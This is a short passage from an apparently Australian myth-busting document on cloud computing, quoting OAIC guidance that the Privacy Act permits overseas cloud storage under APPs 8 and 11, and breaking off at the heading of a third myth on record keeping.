  • “Generally, no. The Privacy Act does not prevent an Australian Privacy Principle (APP) entity from engaging a cloud service provider to store or process personal information overseas. The APP entity must comply with the APPs in sending personal information to the overseas cloud service provider, just as they need to for any other overseas outsourcing arrangement. In addition, the Office of the Australian Information Commissioner’s Guide to securing personal information: ‘Reasonable steps’ to protect personal information discusses security considerations that may be relevant under APP 11 when using cloud computing.” https://www.oaic.gov.au/agencies-and-organisations/agency-resources/privacy-agency-resource-4-sending-personalinformation-overseas Additionally, APP 8 provides the criteria for cross-border disclosure of personal information, which ensures the right practices for data residing off-shore are in place. Our Australian privacy frameworks establish the accountabilities to ensure the appropriate privacy and security controls are in place to maintain confidence in our personal information in the cloud.

  • Myth 3: Information in the cloud is not managed properly and does not comply with record keeping obligations